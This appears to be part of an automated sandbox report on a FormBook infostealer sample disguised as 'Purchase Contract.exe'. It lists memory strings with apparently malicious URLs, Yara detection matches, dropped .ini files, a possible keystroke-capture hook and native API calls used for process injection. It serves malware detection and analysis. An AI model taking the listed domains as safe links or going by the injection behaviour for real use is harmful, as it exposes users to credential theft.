Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.com/mq3/www.usepelican.com
Source: explorer.exe, 00000002.00000003.1092913074.0000000007DBD000.00000004.00000001.sdmpString found in binary or memory: http://www.zcs-edu.comReferer:
Source: explorer.exe, 00000002.00000000.788628972.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000003.00000002.2009341163.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=vamojunto&amp;e=com
Source: control.exe, 00000003.00000002.2009341163.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=vamojunto&e=com
Source: control.exe, 00000003.00000002.2009341163.0000000004E2F000.00000004.00000001.sdmpString found in binary or memory: https://www.samdeng.works/mq3?Kxlpd=OPoK3Mmn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara matchFile source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini
Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrf.ini
Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sampleStatic PE information: Filename: Purchase Contract.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_05D9A5F0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A540 NtDelayExecution,LdrInitializeThunk,0_2_05D9A540
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A560 NtQuerySystemInformation,LdrInitializeThunk,0_2_05D9A560
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A480 NtMapViewOfSection,LdrInitializeThunk,0_2_05D9A480
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A4A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_05D9A4A0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A410 NtQueryInformationToken,LdrInitializeThunk,0_2_05D9A410
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A750 NtCreateFile,LdrInitializeThunk,0_2_05D9A750
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A700 NtProtectVirtualMemory,LdrInitializeThunk,0_2_05D9A700
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A720 NtResumeThread,LdrInitializeThunk,0_2_05D9A720
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A6A0 NtCreateSection,LdrInitializeThunk,0_2_05D9A6A0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A610 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_05D9A610
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_05D9A3E0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A360 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_05D9A360
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A2D0 NtClose,LdrInitializeThunk,0_2_05D9A2D0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A240 NtReadFile,LdrInitializeThunk,0_2_05D9A240
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A5A0 NtWriteVirtualMemory,0_2_05D9A5A0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9BD40 NtSuspendThread,0_2_05D9BD40
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A520 NtEnumerateKey,0_2_05D9A520
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9ACE0 NtCreateMutant,0_2_05D9ACE0
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9B470 NtOpenThread,0_2_05D9B470
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A470 NtSetInformationFile,0_2_05D9A470
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A460 NtOpenProcess,0_2_05D9A460
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9B410 NtOpenProcessToken,0_2_05D9B410
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A430 NtQueryVirtualMemory,0_2_05D9A430
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A780 NtOpenDirectoryObject,0_2_05D9A780
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A710 NtQuerySection,0_2_05D9A710
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A6D0 NtCreateProcessEx,0_2_05D9A6D0
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A650 NtQueueApcThread,0_2_05D9A650
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9B0B0 NtGetContextThread,0_2_05D9B0B0
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A800 NtSetValueKey,0_2_05D9A800
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A3D0 NtCreateKey,0_2_05D9A3D0
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A350 NtQueryValueKey,0_2_05D9A350
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A370 NtQueryInformationProcess,0_2_05D9A370
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A310 NtEnumerateValueKey,0_2_05D9A310
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A2F0 NtQueryInformationFile,0_2_05D9A2F0
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A260 NtWriteFile,0_2_05D9A260
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9BA30 NtSetContextThread,0_2_05D9BA30
Source: C:\Users\user\Desktop\Purchase Contract.exe | Code function: 0_2_05D9A220 NtWaitForSingleObject,0_2_05D9A220
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA470 NtSetInformationFile,LdrInitializeThunk,3_2_044FA470
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA410 NtQueryInformationToken,LdrInitializeThunk,3_2_044FA410
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FACE0 NtCreateMutant,LdrInitializeThunk,3_2_044FACE0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA480 NtMapViewOfSection,LdrInitializeThunk,3_2_044FA480
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA540 NtDelayExecution,LdrInitializeThunk,3_2_044FA540
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA560 NtQuerySystemInformation,LdrInitializeThunk,3_2_044FA560
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_044FA610
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA6A0 NtCreateSection,LdrInitializeThunk,3_2_044FA6A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA750 NtCreateFile,LdrInitializeThunk,3_2_044FA750
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA800 NtSetValueKey,LdrInitializeThunk,3_2_044FA800
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA240 NtReadFile,LdrInitializeThunk,3_2_044FA240
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA260 NtWriteFile,LdrInitializeThunk,3_2_044FA260
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA2D0 NtClose,LdrInitializeThunk,3_2_044FA2D0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA350 NtQueryValueKey,LdrInitializeThunk,3_2_044FA350
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_044FA360
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA310 NtEnumerateValueKey,LdrInitializeThunk,3_2_044FA310
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA3D0 NtCreateKey,LdrInitializeThunk,3_2_044FA3D0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_044FA3E0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA460 NtOpenProcess,3_2_044FA460
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FB470 NtOpenThread,3_2_044FB470
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FB410 NtOpenProcessToken,3_2_044FB410
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA430 NtQueryVirtualMemory,3_2_044FA430
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA4A0 NtUnmapViewOfSection,3_2_044FA4A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FBD40 NtSuspendThread,3_2_044FBD40
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA520 NtEnumerateKey,3_2_044FA520
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA5F0 NtReadVirtualMemory,3_2_044FA5F0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA5A0 NtWriteVirtualMemory,3_2_044FA5A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA650 NtQueueApcThread,3_2_044FA650
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA6D0 NtCreateProcessEx,3_2_044FA6D0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA700 NtProtectVirtualMemory,3_2_044FA700
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA710 NtQuerySection,3_2_044FA710
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA720 NtResumeThread,3_2_044FA720
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA780 NtOpenDirectoryObject,3_2_044FA780
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FB0B0 NtGetContextThread,3_2_044FB0B0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA220 NtWaitForSingleObject,3_2_044FA220
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FBA30 NtSetContextThread,3_2_044FBA30
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA2F0 NtQueryInformationFile,3_2_044FA2F0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_044FA370 NtQueryInformationProcess,3_2_044FA370
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976BC0 NtCreateFile,3_2_02976BC0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976CF0 NtClose,3_2_02976CF0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976C70 NtReadFile,3_2_02976C70
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976DA0 NtAllocateVirtualMemory,3_2_02976DA0
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976CEA NtClose,3_2_02976CEA
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976C6A NtReadFile,3_2_02976C6A
Source: C:\Windows\SysWOW64\control.exe | Code function: 3_2_02976D9C NtAllocateVirtualMemory,3_2_02976D9C
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A610 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_0622A610
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A6A0 NtCreateSection,LdrInitializeThunk,13_2_0622A6A0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A720 NtResumeThread,LdrInitializeThunk,13_2_0622A720
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A700 NtProtectVirtualMemory,LdrInitializeThunk,13_2_0622A700
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A750 NtCreateFile,LdrInitializeThunk,13_2_0622A750
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A410 NtQueryInformationToken,LdrInitializeThunk,13_2_0622A410
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A4A0 NtUnmapViewOfSection,LdrInitializeThunk,13_2_0622A4A0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A480 NtMapViewOfSection,LdrInitializeThunk,13_2_0622A480
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A560 NtQuerySystemInformation,LdrInitializeThunk,13_2_0622A560
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A540 NtDelayExecution,LdrInitializeThunk,13_2_0622A540
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A5F0 NtReadVirtualMemory,LdrInitializeThunk,13_2_0622A5F0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A240 NtReadFile,LdrInitializeThunk,13_2_0622A240
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A2D0 NtClose,LdrInitializeThunk,13_2_0622A2D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A360 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_0622A360
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A3E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_0622A3E0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A650 NtQueueApcThread,13_2_0622A650
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A6D0 NtCreateProcessEx,13_2_0622A6D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A710 NtQuerySection,13_2_0622A710
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A780 NtOpenDirectoryObject,13_2_0622A780
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A430 NtQueryVirtualMemory,13_2_0622A430
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622B410 NtOpenProcessToken,13_2_0622B410
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A460 NtOpenProcess,13_2_0622A460
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622B470 NtOpenThread,13_2_0622B470
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A470 NtSetInformationFile,13_2_0622A470
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622ACE0 NtCreateMutant,13_2_0622ACE0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A520 NtEnumerateKey,13_2_0622A520
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622BD40 NtSuspendThread,13_2_0622BD40
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A5A0 NtWriteVirtualMemory,13_2_0622A5A0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A220 NtWaitForSingleObject,13_2_0622A220
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622BA30 NtSetContextThread,13_2_0622BA30
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A260 NtWriteFile,13_2_0622A260
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A2F0 NtQueryInformationFile,13_2_0622A2F0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A310 NtEnumerateValueKey,13_2_0622A310
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A370 NtQueryInformationProcess,13_2_0622A370
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A350 NtQueryValueKey,13_2_0622A350
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A3D0 NtCreateKey,13_2_0622A3D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622A800 NtSetValueKey,13_2_0622A800
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe | Code function: 13_2_0622B0B0 NtGetContextThread,13_2_0622B0B0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1ACE0 NtCreateMutant,LdrInitializeThunk,14_2_04E1ACE0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A560 NtQuerySystemInformation,LdrInitializeThunk,14_2_04E1A560
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A610 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04E1A610
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A2D0 NtClose,LdrInitializeThunk,14_2_04E1A2D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A3E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04E1A3E0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A360 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04E1A360
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A4A0 NtUnmapViewOfSection,14_2_04E1A4A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A480 NtMapViewOfSection,14_2_04E1A480
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A460 NtOpenProcess,14_2_04E1A460
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1B470 NtOpenThread,14_2_04E1B470
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A470 NtSetInformationFile,14_2_04E1A470
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A430 NtQueryVirtualMemory,14_2_04E1A430
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A410 NtQueryInformationToken,14_2_04E1A410
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1B410 NtOpenProcessToken,14_2_04E1B410
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A5F0 NtReadVirtualMemory,14_2_04E1A5F0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A5A0 NtWriteVirtualMemory,14_2_04E1A5A0
